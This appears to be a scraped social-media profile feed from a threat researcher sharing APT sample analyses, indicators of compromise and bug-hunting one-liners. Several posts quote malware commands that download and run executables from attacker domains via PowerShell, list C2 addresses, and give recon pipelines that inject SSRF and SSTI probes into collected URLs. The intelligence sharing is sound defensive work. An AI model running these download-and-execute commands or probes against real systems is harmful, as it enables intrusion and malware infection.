zhixiang hao
@HaoZhixiang
Followers
1K
Following
426
Media
170
Statuses
505
APT threat,Web security,Osint Shandong Lanxiang School China。My sample analysis is just for learning research
Central Region, Singapore
Joined November 2021
It is estimated to be an attack targeting India. The content of the malicious DOCM document is the mathematics, science and technology content of the University of Madrid in India.The VBA code will be executed when opened, and the bin file is embedded in the document. CrimsonRAT
1
5
16
Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: https://t.co/0NhDIqAr4U and here https://t.co/pWZ8cC7azy) (1 of 5)
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia,There is vba macro code powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
1
24
42
@HaoZhixiang @Kornelij @N_Babajanyan thank you for pointing us to this, we've done some additional research and will release more details soon
cyberhub.am
Threat-researchers at CyberHUB-AM, with the support from Internews’ Martijn Grooten, are tracking a Remote Access Trojan targeting the Armenia International Airports and Armenian State Bodies. The...
1
1
2
@Kornelij @N_Babajanyan Hi, I have found the files downloaded by the dead C2, as well as the ps1 and dll files. download url: https://t.co/ES6y91ZfTO
2
4
12
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia,There is vba macro code powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
5
32
94
Web security, bug hunting and sharing of online monitoring methods for subdomain takeover. Can also detect malicious IOC indicators https://t.co/trKR5XeBpt
0
0
1
APT Gamaredon The content of the document is a forged document of "Electronic Trust Service of the Shastinska Regional Electricity Administration of Ukraine" наказ_в_дпов_дальної особи.doc http]://principles67.vilitord.ru/BUDGET/stoppage56/rejoice/already[.]mkv can't access
0
6
10
Bitter APT Attack sample,The bait is a chm file, the content is to let everyone report crimes using the Internet chm->cmd->powershell->schtasks->dowwnload jpg->exec command Guess the collection target in the early stage, and then accurately change the pic.jpg command control
3
10
24
c2:207.180.194.63 http[:]//createdaliyplan.serveftp.com:8080/user_details
0
0
0
SideCopy APT attacks on the side, China and the United States are currently conducting trade negotiations, using trade between China and the United States as a bait to attack. cmd->mshta->bat->reg->cdrzip.exe->DLL Side-Loading->c2 attack history https://t.co/cSCs6XNK16
1
17
32
The two commands help you complete sensitive information mining, which is suitable for large-scale batch methods. gau https://t.co/j12Zbrfce8 --subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee urls.txt ffuf -w urls.txt:HFUZZ -u HFUZZ -replay-proxy http://burpip:port
0
1
14
One command to get ssrf mining gau --subs https://t.co/J6ACcAEAOJ | gf ssrf | sort -u | httpx -mc 200 | qsreplace "burpcollaborator" >> ssrfuzzxxx.txt; ffuf -c -w ssrfuzzxxx.txt -u FUZZ happy hunting everyone😄 @0x_rood @Rhynorater @zseano @h1Disclosed @h4x0r_dz @nav1n0x
1
14
61
md5:d74088ca99c5f2834e945e2330729d4c alg.exe 551c155f4fce82bba4cc92e56f1ecb84
1
1
1
Recently, some security personnel released samples of North Korean APT organizations, and took a brief look. chm->wscript->jse->reg->cmd->powershell->download malware PE cmd /c powershell iwr -outf %tmp%\alg.exe https://jutise[.]fun/aypbr & start %tmp%\alg.exe
2
13
35
Web vulnerability mining SSTI vulnerability sudo waybackurls https://t.co/jQ7t8bcgds|grep -Ev "\.(jpeg|jpg|png|ico|js|css|svg|ttf|eot|woff|webp)$" | qsreplace "ssti{{9*9}}" > fuzz.txt for url in $(cat fuzz.txt); do python3 https://t.co/1f1XFUaCfA -u $url; print $url; done
1
28
65
more parameters return_path|next_url|checkout_urlretURL|link|file|fallback|callback_url
0
0
2